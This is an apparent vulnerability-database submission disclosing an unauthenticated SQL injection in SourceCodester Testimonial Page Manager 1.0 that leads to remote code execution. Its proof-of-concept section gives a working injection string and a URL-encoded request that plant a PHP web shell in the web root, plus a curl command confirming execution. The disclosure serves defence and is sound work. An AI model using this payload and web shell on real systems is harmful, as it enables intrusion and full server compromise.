| 제목 | Sourcecodester Testimonial Page Manager 1.0 SQLi leading to RCE |
|---|
| 설명 | ## Summary
Parameters in `delete-testimonial.php` are not sanitized before being used to directly construct a SQL query. In standard installations, a malicious user can use this to write malicious PHP code to a file accessible from the web root, leading to remote code execution.
## Issue Description
SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability can allow attackers to gain remote code execution over the affected resource.
Note: There is no authentication required to use this software. The entry point for this vulnerability is `delete-testimonial.php`. This endpoint takes the input values and submits them to the backend SQL database without sanitizing or parameterizing the input values.
`delete-testimonial.php` lines 4-8:
```
if (isset($_GET['testimony'])) {
$testimony = $_GET['testimony'];
try {
$query = "DELETE FROM tbl_testimony WHERE tbl_testimony_id = '$testimony'";
...
}
```
Direct concatenation of user input without sanitization leads to SQL injection.
## Affected URL/Area
`delete-testimonial.php`
## Risk Rating
- Risk: **HIGH**
- Exploitation Difficulty: **LOW**
## CVSS Justification
### Network - AV
The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet.
### Low - AC
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
### None - PR
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the the vulnerable system to carry out an attack.
### None - UI
The vulnerable system can be exploited without interaction from any user.
### Changed - S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component.
### High - C
There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.
### High - I
There is a total loss of data integrity.
### High - A
There is a total loss of availability.
## Steps to reproduce
POC:
Attack string, places a file called `rce.php` at the web root:
```
'; SELECT '<?php $command = $_GET[\'cmd\'];$result = shell_exec($command);echo "<pre>$result</pre>";?>' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php'; -- ''
```
URL encoded request:
```
GET /testimonial-page-manager/endpoint/delete-testimony.php?testimony=%27%3b%20%53%45%4c%45%43%54%20%27%3c%3f%70%68%70%20%24%63%6f%6d%6d%61%6e%64%20%3d%20%24%5f%47%45%54%5b%5c%27%63%6d%64%5c%27%5d%3b%24%72%65%73%75%6c%74%20%3d%20%73%68%65%6c%6c%5f%65%78%65%63%28%24%63%6f%6d%6d%61%6e%64%29%3b%65%63%68%6f%20%22%3c%70%72%65%3e%24%72%65%73%75%6c%74%3c%2f%70%72%65%3e%22%3b%3f%3e%27%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%43%3a%5c%5c%78%61%6d%70%70%5c%5c%68%74%64%6f%63%73%5c%5c%72%63%65%2e%70%68%70%27%3b%20%2d%2d%20%27%27
HTTP/1.1
```
Send this with a repeater of your choice. This payload enables RCE with the permissions of the user who started the SQL server process.
Check RCE:
```
$ curl http://localhost/rce.php?cmd=time
The current time is: 21:33:42.85
Enter the new time:
```
## Recommended Fix
Use parameterized queries. Thoroughly audit software before publishing.
## References
https://cwe.mitre.org/data/definitions/89.html
https://owasp.org/www-community/attacks/SQL_Injection
https://www.rapid7.com/fundamentals/sql-injection-attacks/
https://en.wikipedia.org/wiki/SQL_injection
https://brightsec.com/blog/sql-injection-attack/
## Notes
Please credit Michael Blunt as the discovering researcher. |
|---|
| 사용자 | mikel22 (UID 51822) |
|---|
| 제출 | 2024. 02. 01. AM 04:10 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 02. 02. AM 08:47 (1 day later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 252695 [SourceCodester Testimonial Page Manager 1.0 HTTP GET Request delete-testimonial.php testimony SQL 주입] |
|---|
| 포인트들 | 17 |
|---|